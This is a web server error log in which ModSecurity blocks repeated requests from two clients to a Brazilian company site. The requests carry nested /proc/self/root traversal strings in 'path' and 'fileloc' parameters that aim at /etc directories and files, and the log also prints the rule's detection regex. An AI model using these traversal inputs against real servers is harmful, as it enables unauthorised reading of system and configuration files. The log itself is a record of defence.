[Wed Mar 18 08:48:46.345496 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:44474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRHuyqAr6etmhZHNqp5wAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:51.205292 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:44480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRI9a6ubjKNq_cu4aEjAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:53.567364 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:59868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRJeoXxyEfFpUF8f9ahgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:54.869137 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:59870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRJuoXxyEfFpUF8f9aiAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:48:55.333488 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:34822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRJ8df6f5d65gmYZTANwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:49:11.558814 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:59876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRN_u8EFLIOrSqIpvxVgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:49:13.975378 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:48170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqROcdf6f5d65gmYZTAUQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:49:16.387090 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:48172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRPOoXxyEfFpUF8f9akgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:49:23.231005 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:48188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRQ-w_le52K8_3pV3MXwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:49:25.450420 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:37508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRREzinOy1jxa1j4f_zgAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:49:26.871471 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:37514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRRta6ubjKNq_cu4aEswAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:49:28.134776 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:37518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRSOoXxyEfFpUF8f9alQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:49:51.144919 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:35368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRX8df6f5d65gmYZTAggAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:49:57.383517 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:38454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRZda6ubjKNq_cu4aEvwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:50:03.705387 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:38542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRa9Y0UrI5A3LftIyN_AAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:50:03.895408 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:43452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRa_u8EFLIOrSqIpvxbgAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:50:27.351069 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:43468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRg9Y0UrI5A3LftIyOFgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:50:51.343733 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:59570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRm-oXxyEfFpUF8f9a6QAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:50:52.657226 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:58374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRnNa6ubjKNq_cu4aE9wAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:51:00.983414 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:58378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRpOw_le52K8_3pV3MkgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:51:04.815394 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:36190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRqPu8EFLIOrSqIpvxnAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:51:15.407807 2026] [mime_magic:error] [pid 31803:tid 140411540502272] (70014)End of file found: [client 74.7.241.31:36196] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib
